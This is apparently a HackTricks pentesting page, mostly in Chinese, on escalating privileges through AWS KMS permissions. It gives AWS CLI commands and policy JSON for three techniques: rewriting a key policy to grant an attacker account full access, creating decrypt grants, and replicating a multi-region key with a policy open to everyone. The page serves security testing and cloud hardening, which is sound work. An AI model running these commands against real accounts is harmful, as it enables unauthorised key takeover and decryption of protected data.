AWS - KMS Privesc

支持 HackTricks

KMS

有关 KMS 的更多信息,请查看:

kms:ListKeys,kms:PutKeyPolicy, (kms:ListKeyPolicies, kms:GetKeyPolicy)

拥有这些权限后,可以修改密钥的访问权限,使其可以被其他账户或甚至任何人使用:

aws kms list-keys
aws kms list-key-policies --key-id <id> # Although only 1 max per key
aws kms get-key-policy --key-id <id> --policy-name <policy_name>
# AWS KMS keys can only have 1 policy, so you need to use the same name to overwrite the policy (the name is usually "default")
aws kms put-key-policy --key-id <id> --policy-name <policy_name> --policy file:///tmp/policy.json

policy.json:

{
"Version" : "2012-10-17",
"Id" : "key-consolepolicy-3",
"Statement" : [
{
"Sid" : "Enable IAM User Permissions",
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<origin_account>:root"
},
"Action" : "kms:*",
"Resource" : "*"
},
{
"Sid" : "Allow all use",
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<attackers_account>:root"
},
"Action" : [ "kms:*" ],
"Resource" : "*"
}
]
}

kms:CreateGrant

允许主体使用 KMS 密钥:

aws kms create-grant \
--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
--grantee-principal arn:aws:iam::123456789012:user/exampleUser \
--operations Decrypt

请注意,KMS 可能需要几分钟才能 在生成授予后允许用户使用密钥。一旦时间过去,主体可以在不需要指定任何内容的情况下使用 KMS 密钥。 但是,如果需要立即使用授予 请使用授予令牌(查看以下代码)。 有关 更多信息,请阅读此内容

# Use the grant token in a request
aws kms generate-data-key \
--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
–-key-spec AES_256 \
--grant-tokens $token

注意,可以使用以下命令列出密钥的授权:

aws kms list-grants --key-id <value>

kms:CreateKey, kms:ReplicateKey

拥有这些权限,可以在不同区域以不同策略复制启用多区域的 KMS 密钥。

因此,攻击者可以利用这一点来获取对密钥的权限提升并使用它。

aws kms replicate-key --key-id mrk-c10357313a644d69b4b28b88523ef20c --replica-region eu-west-3 --bypass-policy-lockout-safety-check --policy file:///tmp/policy.yml

{
"Version": "2012-10-17",
"Id": "key-consolepolicy-3",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "kms:*",
"Resource": "*"
}
]
}

kms:Decrypt

此权限允许使用密钥解密某些信息。 有关更多信息,请查看:

支持 HackTricks

Last updated